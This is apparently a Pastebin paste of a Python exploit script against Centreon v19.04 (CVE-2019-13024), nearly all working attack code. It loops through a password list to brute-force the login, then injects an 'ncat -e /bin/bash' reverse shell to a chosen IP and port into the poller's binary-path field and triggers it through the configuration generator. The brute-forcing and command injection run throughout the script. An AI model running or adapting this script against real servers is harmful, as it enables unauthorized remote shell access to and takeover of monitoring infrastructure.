Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- '''
- # Exploit Title: Centreon v19.04 authenticated Remote Code Execution
- # Date: 28/06/2019
- # Exploit Author: Askar (@mohammadaskar2)
- # CVE : CVE-2019-13024
- # Vendor Homepage: https://www.centreon.com/
- # Software link: https://download.centreon.com
- # Version: v19.04
- # Tested on: CentOS 7.6 / PHP 5.4.16
- '''
- import requests
- import sys
- import warnings
- from bs4 import BeautifulSoup
- # turn off BeautifulSoup warnings
- warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
- if len(sys.argv) != 6:
- print(len(sys.argv))
- print("[~] Usage : ./centreon-exploit.py url username password ip port")
- exit()
- with open('best110.txt', 'r') as passlist:
- plist = passlist.readlines()
- with open('tt.txt', 'r') as userlist:
- ulist = userlist.readlines()
- for password in plist:
- password=password.strip()
- url = sys.argv[1]
- username = sys.argv[2]
- ip = sys.argv[4]
- port = sys.argv[5]
- request = requests.session()
- print("[+] Retrieving CSRF token to submit the login form")
- page = request.get(url+"/index.php")
- html_content = page.text
- soup = BeautifulSoup(html_content)
- token = soup.findAll('input')[3].get("value")
- login_info = {
- "useralias": username,
- "password": password,
- "submitLogin": "Connect",
- "centreon_token": token
- }
- login_request = request.post(url+"/index.php", login_info)
- print("[+] Login token is : {0}".format(token))
- if "Your credentials are incorrect." not in login_request.text:
- print("[+] Logged In Sucssfully", username, password)
- print("[+] Retrieving Poller token")
- poller_configuration_page = url + "/main.get.php?p=60901"
- get_poller_token = request.get(poller_configuration_page)
- poller_html = get_poller_token.text
- poller_soup = BeautifulSoup(poller_html)
- poller_token = poller_soup.findAll('input')[24].get("value")
- print("[+] Poller token is : {0}".format(poller_token))
- payload_info = {
- "name": "Central",
- "ns_ip_address": "127.0.0.1",
- # this value should be 1 always
- "localhost[localhost]": "1",
- "is_default[is_default]": "0",
- "remote_id": "",
- "ssh_port": "22",
- "init_script": "centengine",
- # this value contains the payload , you can change it as you want
- "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
- "nagiostats_bin": "/usr/sbin/centenginestats",
- "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
- "centreonbroker_cfg_path": "/etc/centreon-broker",
- "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
- "centreonbroker_logs_path": "",
- "centreonconnector_path": "/usr/lib64/centreon-connector",
- "init_script_centreontrapd": "centreontrapd",
- "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
- "ns_activate[ns_activate]": "1",
- "submitC": "Save",
- "id": "1",
- "o": "c",
- "centreon_token": poller_token,
- }
- send_payload = request.post(poller_configuration_page, payload_info)
- print("[+] Injecting Done, triggering the payload")
- print("[+] Check your netcat listener !")
- generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
- xml_page_data = {
- "poller": "1",
- "debug": "true",
- "generate": "true",
- }
- request.post(generate_xml_page, xml_page_data)
- #else:
- #print("[-] Wrong credentials", password, username)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement